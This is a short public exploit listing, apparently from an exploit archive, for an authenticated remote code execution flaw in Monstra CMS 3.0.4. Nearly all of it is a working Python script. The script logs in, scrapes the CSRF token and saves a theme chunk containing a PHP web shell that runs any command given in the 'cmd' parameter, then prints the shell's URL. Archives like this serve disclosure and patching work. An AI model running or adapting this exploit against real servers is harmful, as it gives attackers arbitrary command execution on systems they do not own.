Headline
Monstra CMS 3.0.4 Remote Code Execution
Monstra CMS version 3.0.4 suffers from a remote code execution vulnerability. Original discovery of code execution in this version is attributed to Ishaq Mohammed in December of 2017.
# Exploit Title: Monstra CMS 3.0.4 - Remote Code Execution (RCE)# Date: 05.05.2024# Exploit Author: Ahmet Ümit BAYRAM# Vendor Homepage: https://monstra.org/# Software Link: https://monstra.org/monstra-3.0.4.zip# Version: 3.0.4# Tested on: MacOSimport requestsimport randomimport stringimport timeimport reimport sysif len(sys.argv) < 4:print("Usage: python3 script.py <url> <username> <password>")sys.exit(1)base_url = sys.argv[1]username = sys.argv[2]password = sys.argv[3]session = requests.Session()login_url = f'{base_url}/admin/index.php?id=dashboard'login_data = {'login': username,'password': password,'login_submit': 'Log+In'}filename = ''.join(random.choices(string.ascii_lowercase + string.digits, k=5))print("Logging in...")response = session.post(login_url, data=login_data)if 'Dashboard' in response.text:print("Login successful")else:print("Login failed")exit()time.sleep(3)edit_url = f'{base_url}/admin/index.php?id=themes&action=add_chunk'response = session.get(edit_url) # CSRF token bulmak için edit sayfasınaerişimtoken_search = re.search(r'input type="hidden" id="csrf" name="csrf" value="(.*?)"', response.text)if token_search:token = token_search.group(1)else:print("CSRF token could not be found.")exit()content = '''<html><body><form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"><input type="TEXT" name="cmd" autofocus id="cmd" size="80"><input type="SUBMIT" value="Execute"></form><pre><?phpif(isset($_GET['cmd'])){system($_GET['cmd']);}?></pre></body></html>'''edit_data = {'csrf': token,'name': filename,'content': content,'add_file': 'Save'}print("Preparing shell...")response = session.post(edit_url, data=edit_data)time.sleep(3)if response.status_code == 200:print(f"Your shell is ready: {base_url}/public/themes/default/{filename}.chunk.php")else:print("Failed to prepare shell.")